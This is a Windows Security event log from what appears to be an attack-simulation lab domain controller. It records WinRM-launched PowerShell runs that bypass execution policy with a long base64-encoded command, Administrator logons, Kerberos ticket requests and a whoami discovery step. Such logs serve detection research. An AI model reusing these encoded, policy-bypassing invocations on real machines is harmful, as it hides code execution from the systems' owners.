	Process Command Line:	PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258083
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xc14
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1080
	Creator Process Name:	C:\Windows\System32\winrshost.exe
	Process Command Line:	C:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=258082
Keywords=Audit Success
Message=Special privileges assigned to new logon.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x570E33

Privileges:		SeSecurityPrivilege
			SeTakeOwnershipPrivilege
			SeLoadDriverPrivilege
			SeBackupPrivilege
			SeRestorePrivilege
			SeDebugPrivilege
			SeSystemEnvironmentPrivilege
			SeEnableDelegationPrivilege
			SeImpersonatePrivilege
			SeDelegateSessionUserImpersonatePrivilege
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=258081
Keywords=Audit Success
Message=An account was successfully logged on.

Subject:
	Security ID:		NT AUTHORITY\NETWORK SERVICE
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E4

Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x570E33
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{050B45FC-0D0E-AC38-6713-C08B99C3BD76}

Process Information:
	Process ID:		0x534
	Process Name:		C:\Windows\System32\svchost.exe

Network Information:
	Workstation Name:	WIN-DC-725
	Source Network Address:	-
	Source Port:		-

Detailed Authentication Information:
	Logon Process:		Advapi  
	Authentication Package:	Negotiate
	Transited Services:	-
	Package Name (NTLM only):	-
	Key Length:		0

This event is generated when a logon session is created. It is generated on the computer that was accessed.

The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.

The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).

The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.

The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.

The impersonation level field indicates the extent to which a process in the logon session can impersonate.

The authentication information fields provide detailed information about this specific logon request.
	- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
	- Transited services indicate which intermediate services have participated in this logon request.
	- Package name indicates which sub-protocol was used among the NTLM protocols.
	- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4648
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=258080
Keywords=Audit Success
Message=A logon was attempted using explicit credentials.

Subject:
	Security ID:		NT AUTHORITY\NETWORK SERVICE
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E4
	Logon GUID:		{00000000-0000-0000-0000-000000000000}

Account Whose Credentials Were Used:
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon GUID:		{050B45FC-0D0E-AC38-6713-C08B99C3BD76}

Target Server:
	Target Server Name:	localhost
	Additional Information:	localhost

Process Information:
	Process ID:		0x534
	Process Name:		C:\Windows\System32\svchost.exe

Network Information:
	Network Address:	-
	Port:			-

This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4769
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Kerberos Service Ticket Operations
OpCode=Info
RecordNumber=258079
Keywords=Audit Success
Message=A Kerberos service ticket was requested.

Account Information:
	Account Name:		Administrator@ATTACKRANGE.LOCAL
	Account Domain:		ATTACKRANGE.LOCAL
	Logon GUID:		{050B45FC-0D0E-AC38-6713-C08B99C3BD76}

Service Information:
	Service Name:		WIN-DC-725$
	Service ID:		ATTACKRANGE\WIN-DC-725$

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810000
	Ticket Encryption Type:	0x12
	Failure Code:		0x0
	Transited Services:	-

This event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.

This event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.

Ticket options, encryption types, and failure codes are defined in RFC 4120.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4768
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Kerberos Authentication Service
OpCode=Info
RecordNumber=258078
Keywords=Audit Success
Message=A Kerberos authentication ticket (TGT) was requested.

Account Information:
	Account Name:		Administrator
	Supplied Realm Name:	ATTACKRANGE
	User ID:			ATTACKRANGE\Administrator

Service Information:
	Service Name:		krbtgt
	Service ID:		ATTACKRANGE\krbtgt

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810010
	Result Code:		0x0
	Ticket Encryption Type:	0x12
	Pre-Authentication Type:	2

Certificate Information:
	Certificate Issuer Name:		
	Certificate Serial Number:	
	Certificate Thumbprint:		

Certificate information is only provided if a certificate was used for pre-authentication.

Pre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258077
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xac8
	New Process Name:	C:\Windows\System32\conhost.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1080
	Creator Process Name:	C:\Windows\System32\winrshost.exe
	Process Command Line:	\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258076
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Target Subject:
	Security ID:		NULL SID
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D

Process Information:
	New Process ID:		0x1080
	New Process Name:	C:\Windows\System32\winrshost.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x260
	Creator Process Name:	C:\Windows\System32\svchost.exe
	Process Command Line:	C:\Windows\system32\WinrsHost.exe -Embedding

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258075
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xf88
	New Process Name:	C:\Windows\System32\dllhost.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\System Mandatory Level
	Creator Process ID:	0x260
	Creator Process Name:	C:\Windows\System32\svchost.exe
	Process Command Line:	C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258074
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x5d8
	Process Name:		C:\Windows\System32\svchost.exe
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=258073
Keywords=Audit Success
Message=Special privileges assigned to new logon.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D

Privileges:		SeSecurityPrivilege
			SeTakeOwnershipPrivilege
			SeLoadDriverPrivilege
			SeBackupPrivilege
			SeRestorePrivilege
			SeDebugPrivilege
			SeSystemEnvironmentPrivilege
			SeEnableDelegationPrivilege
			SeImpersonatePrivilege
			SeDelegateSessionUserImpersonatePrivilege
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=258072
Keywords=Audit Success
Message=An account was successfully logged on.

Subject:
	Security ID:		NT AUTHORITY\NETWORK SERVICE
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E4

Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{050B45FC-0D0E-AC38-6713-C08B99C3BD76}

Process Information:
	Process ID:		0x534
	Process Name:		C:\Windows\System32\svchost.exe

Network Information:
	Workstation Name:	WIN-DC-725
	Source Network Address:	-
	Source Port:		-

Detailed Authentication Information:
	Logon Process:		Advapi  
	Authentication Package:	Negotiate
	Transited Services:	-
	Package Name (NTLM only):	-
	Key Length:		0

This event is generated when a logon session is created. It is generated on the computer that was accessed.

The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.

The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).

The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.

The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.

The impersonation level field indicates the extent to which a process in the logon session can impersonate.

The authentication information fields provide detailed information about this specific logon request.
	- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
	- Transited services indicate which intermediate services have participated in this logon request.
	- Package name indicates which sub-protocol was used among the NTLM protocols.
	- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4648
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=258071
Keywords=Audit Success
Message=A logon was attempted using explicit credentials.

Subject:
	Security ID:		NT AUTHORITY\NETWORK SERVICE
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E4
	Logon GUID:		{00000000-0000-0000-0000-000000000000}

Account Whose Credentials Were Used:
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon GUID:		{050B45FC-0D0E-AC38-6713-C08B99C3BD76}

Target Server:
	Target Server Name:	localhost
	Additional Information:	localhost

Process Information:
	Process ID:		0x534
	Process Name:		C:\Windows\System32\svchost.exe

Network Information:
	Network Address:	-
	Port:			-

This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4769
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Kerberos Service Ticket Operations
OpCode=Info
RecordNumber=258070
Keywords=Audit Success
Message=A Kerberos service ticket was requested.

Account Information:
	Account Name:		Administrator@ATTACKRANGE.LOCAL
	Account Domain:		ATTACKRANGE.LOCAL
	Logon GUID:		{050B45FC-0D0E-AC38-6713-C08B99C3BD76}

Service Information:
	Service Name:		WIN-DC-725$
	Service ID:		ATTACKRANGE\WIN-DC-725$

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810000
	Ticket Encryption Type:	0x12
	Failure Code:		0x0
	Transited Services:	-

This event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.

This event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.

Ticket options, encryption types, and failure codes are defined in RFC 4120.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4768
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Kerberos Authentication Service
OpCode=Info
RecordNumber=258069
Keywords=Audit Success
Message=A Kerberos authentication ticket (TGT) was requested.

Account Information:
	Account Name:		Administrator
	Supplied Realm Name:	ATTACKRANGE
	User ID:			ATTACKRANGE\Administrator

Service Information:
	Service Name:		krbtgt
	Service ID:		ATTACKRANGE\krbtgt

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810010
	Result Code:		0x0
	Ticket Encryption Type:	0x12
	Pre-Authentication Type:	2

Certificate Information:
	Certificate Issuer Name:		
	Certificate Serial Number:	
	Certificate Thumbprint:		

Certificate information is only provided if a certificate was used for pre-authentication.

Pre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.
03/12/2021 10:48:24 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258106
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x10b4
	New Process Name:	C:\Windows\System32\whoami.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1348
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\system32\whoami.exe"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

